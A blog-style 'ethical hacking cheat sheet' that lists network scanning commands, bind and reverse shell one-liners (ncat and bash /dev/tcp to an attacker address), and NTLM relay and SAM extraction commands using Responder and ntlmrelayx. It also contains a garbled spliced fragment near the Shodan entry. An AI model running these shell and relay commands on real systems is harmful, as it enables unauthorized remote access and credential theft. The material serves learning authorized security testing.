Ethical Hacking Cheat Sheet: Common Tools and Techniques | Codelivly
Ethical hacking
Ethical Hacking Cheat Sheet: Common Tools and Techniques
Hacking and cybersecurity are complex and ever-changing fields that involve the use of various tools and techniques to gain unauthorized access to systems, networks, or data, or to protect against suc
Rrocky··9 min read
Hacking and cybersecurity are complex and ever-changing fields that involve the use of various tools and techniques to gain unauthorized access to systems, networks, or data, or to protect against such access. Understanding the basics of these fields is important for anyone who wants to stay safe and secure online.
In general, hacking is the practice of using technical skills to gain unauthorized access to systems, networks or data, while cybersecurity is the practice of protecting systems, networks, and data from unauthorized access or attack.
Hackers can be classified as "white hat", "gray hat" and "black hat" depending on their intentions and the way they use their skills. White hat hackers are those who use their skills for legitimate purposes, such as identifying and reporting vulnerabilities in systems. Black hat hackers are those who use their skills for malicious purposes, such as stealing sensitive information or causing damage to systems. Gray hat hackers fall in between, they use their skills to identify vulnerabilities in systems and might use them for personal gain or share them with the public.
NMAP HOST DISCOVERY (ARP, ICMP, SYN 443/TCP, ACK 80/TCP):
# nmap -sn -n 10.5.23.0/24
LIST NMAP SCRIPTS:
# ls /usr/share/nmap/scripts
The target can be specified using CIDR notation (10.5.23.0/24) or range definitions (10.13- 37.5.1-23).
FAST SCAN USING MASSCAN:
# masscan -p80,8000-8100 –rate 20000
10.0.0.0/8
PUBLIC INTERNET SCAN DATABASES:
osint concept in cybersecurity. It describes techniques, risks, or controls that defenders and ethical hackers must understand to protect systems and conduct authorized security testing. Learning Shodan helps you recognize attacks in the wild and apply industry-standard mitigations aligned with frameworks like OWASP and NIST.">shodan.io, censys.io
Shells
START BIND SHELL (ON VICTIM):
# ncat -l -p 2305 -e “/bin/bash -i”
LISTEN FOR REVERSE SHELL (ON ATTACKER):
# ncat -l -p 23
START REVERSE SHELL WITH BASH ONLY (ON VICTIM):
# bash -i &>/dev/tcp/10.5.23.5/42 0>&1
CONNECT TO BIND SHELL (ON ATTACKER):
# ncat 10.5.23.42 2305
START REVERSE SHELL (ON VICTIM):
# ncat -e “/bin/bash -i” 10.5.23.5 23
UPGRADE TO PSEUDO TERMINAL:
# python -c ‘import pty;
pty.spawn(“/bin/bash”)’
Vulnerability DBs and Exploits
EXPLOIT SEARCH (LOCAL COPY OF THE EXPLOIT-DB):
# searchsploit apache
SHOW EXPLOIT FILE PATH AND COPY IT INTO CLIPBOARD:
DISABLE SMB AND HTTP IN RESPONDER.CONF AND START RESPONDER:
# ./Responder.py -I eth0
NTLM RELAY TO TARGET AND EXTRACT SAM FILE:
# ./ntlmrelayx.py -smb2support -t
smb://10.5.23.42
ACCESS FILES VIA SOCKS PROXY:
# proxychains smbclient -m smb3
‘\\10.5.23.42\C$’ -W pc05 -U
Administrator%invalidPwd
Active Directory
Use SharpHound to gather information and import into Bloodhound to analyze.
Download PingCastle from pingcastle.com and generate Report.
Conclusion
In conclusion, hacking and cybersecurity are complex and constantly evolving fields that can include a wide range of tools, techniques, and strategies. It is important to remember that hacking tools can be used for both legitimate and illegitimate purposes, and it's important to use them responsibly and in compliance with the law. A good understanding of the basics of computer science, programming and networking is a starting point to learn more about the field.
A good cybersecurity practice includes keeping the operating system and software up to date, using anti-virus and firewall software, being cautious when opening email attachments or clicking on links in emails, not giving out personal information online, using strong, unique passwords for every account, and avoiding using public Wi-Fi networks. Additionally, it is important to stay informed about the latest threats, vulnerabilities and best practices.
Also, ethical hacking or "white-hat" hacking is one way to use hacking skills for good causes, like identifying vulnerabilities and protect organizations from cyber threats. Thus, it is important to understand and follow the laws, policies and guidelines regarding cyber security practices and ethical hacking.